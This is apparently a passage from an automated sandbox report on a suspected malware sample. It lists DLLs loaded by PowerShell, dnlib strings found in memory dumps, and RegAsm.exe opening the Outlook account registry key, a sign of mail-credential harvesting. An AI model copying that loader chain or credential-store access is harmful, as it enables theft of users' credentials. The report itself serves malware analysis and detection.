                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000A.00000002.3263198460.00000000025AD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3352588129.0000000007C01000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ws\System.Core.pdb source: powershell.exe, 0000000E.00000002.3352588129.0000000007C81000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: tem.Core.pdb_ source: powershell.exe, 0000000A.00000002.3373832812.0000000006C38000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ore.pdb_ source: powershell.exe, 0000000A.00000002.3373832812.0000000006C38000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 0000000E.00000002.3372267954.0000000008D00000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
